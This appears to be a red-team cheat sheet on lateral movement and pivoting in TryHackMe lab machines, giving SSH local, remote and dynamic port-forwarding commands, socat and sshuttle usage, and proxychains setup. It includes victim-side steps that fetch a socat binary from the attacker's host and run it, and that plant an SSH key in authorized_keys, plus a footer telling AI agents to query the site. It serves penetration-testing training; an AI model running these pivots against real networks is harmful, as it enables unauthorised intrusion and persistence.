# Lateral Movement and Pivoting

## SSH Proxy Chaining

### SSH Local Port Forwarding

**Examples**

[Game Zone](/red-team/walkthroughs/tryhackme/game-zone.md)[Internal](/red-team/walkthroughs/tryhackme/internal.md)[Kitty](/red-team/walkthroughs/tryhackme/kitty.md)

**Local port forwarding** allows us to "pull" a port from an SSH server into the SSH client. In our scenario, this could be used to take any service available in our attacker's machine and make it available through a port on PC-1. That way, any host that can't connect directly to the attacker's PC but can connect to PC-1 will now be able to reach the attacker's services through the pivot host.

Using this type of port forwarding would allow us to run reverse shells from hosts that normally wouldn't be able to connect back to us or simply make any service we want available to machines that have no direct connection to us.

<figure><img src="/files/G5efB6Sh7QnN5FaitNMK" alt=""><figcaption></figcaption></figure>

Allows us to gain access to the service running on port 10000 from Kali that was only accessible to the victim from their machine.

**Kali**

```
ssh -L 10000:localhost:10000 $USERNAME@$VICTIM
Password: $ASSWORD
```

### SSH Remote Port Forwarding

**Examples**

&#x20;[Lateral Movement and Pivoting](/red-team/walkthroughs/tryhackme/lateral-movement-and-pivoting.md#ssh-remote-port-forwarding)[Linux: Local Enumeration](/red-team/walkthroughs/tryhackme/linux-local-enumeration.md#bonus-port-forwarding)

In our example, let's assume that firewall policies block the attacker's machine from directly accessing port 3389 on the server. If the attacker has previously compromised PC-1 and, in turn, PC-1 has access to port 3389 of the server, it can be used to pivot to port 3389 using remote port forwarding from PC-1. **Remote port forwarding** allows you to take a reachable port from the SSH client (in this case, PC-1) and project it into a **remote** SSH server (the attacker's machine).

As a result, a port will be opened in the attacker's machine that can be used to connect back to port 3389 in the server through the SSH tunnel. PC-1 will, in turn, proxy the connection so that the server will see all the traffic as if it was coming from PC-1:

<figure><img src="/files/au4Jzrauesl3W2fiWnrT" alt=""><figcaption></figcaption></figure>

Referring to the previous image, to forward port 3389 on the server back to our attacker's machine, we can use the following command on PC-1:

<figure><img src="/files/HErUwe2OAqWG6kFEHYqS" alt=""><figcaption></figcaption></figure>

**Kali**

```
useradd tunneluser
passwd tunneluser
```

**/etc/ssh/sshd\_config**

If it's not working, it could because these settings aren't set

```
AllowTcpForwarding yes
GatewayPorts yes
```

**Victim**

```
ssh tunneluser@$KALI -R 8888:thmdc.za.tryhackme.com:80 -L *:1990:127.0.0.1:1990 -L *:1029:127.0.0.1:1029 -N
```

## Socat

If there is a website running on port 6666 that can only be seen on the Victims side locally, we can forward it so we can see it on Kali. Below will allows us to see the website on our Kali instance on port 7777

**Examples**

[magician](/red-team/walkthroughs/tryhackme/magician.md#port-forwarding-and-finding-flag)[Linux: Local Enumeration](/red-team/walkthroughs/tryhackme/linux-local-enumeration.md#bonus-port-forwarding)

**Kali**

```
wget https://github.com/aledbf/socat-static-binary/releases/download/v0.0.1/socat-linux-amd64
python2 -m SimpleHTTPServer 81
```

**Victim**

```
cd /tmp
wget http://$KALI:81/socat-linux-amd64
chmod +x socat-linux-amd64 
./socat-linux-amd64  tcp-listen:7777,reuseaddr,fork tcp:localhost:6666
```

## sshuttle

**Examples**

[Internal](/red-team/walkthroughs/tryhackme/internal.md)

**Kali**

```
apt install sshuttle
sshuttle -r $USERNAME@$VICTIM 127.0.0.1/24
Password: $PASSWORD
```

### SSH

**Examples**

[Chill Hack](/red-team/walkthroughs/tryhackme/chill-hack.md)[VulnNet: Internal](/red-team/walkthroughs/tryhackme/vulnnet-internal.md)

**Kali**

```
ssh-keygen -t rsa
cat /root/.ssh/id_rsa.pub
```

**Victim**

copy paste id\_rsa.pub from Kali to the Victim server

```
copy id_rsa.pub to /home/$VICTIM/.ssh/authorized_keys
```

**Kali**

```
vi /etc/proxychains.conf
```

**proxychains.conf**

```
socks4 	127.0.0.1 9050
```

**Kali**

```
ssh -D 9050 $USERNAME@VICTIM
```

<figure><img src="/files/XigWFOFHIRR5wMUU8nAx" alt=""><figcaption></figcaption></figure>

I can now see the webpage from Kali but no login credentials to use.

<figure><img src="/files/FU2reWhx3wZSYczlCWxm" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://jeffgthompsons-organization.gitbook.io/red-team/methodologies-and-resources/cheat-sheets/lateral-movement-and-pivoting.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.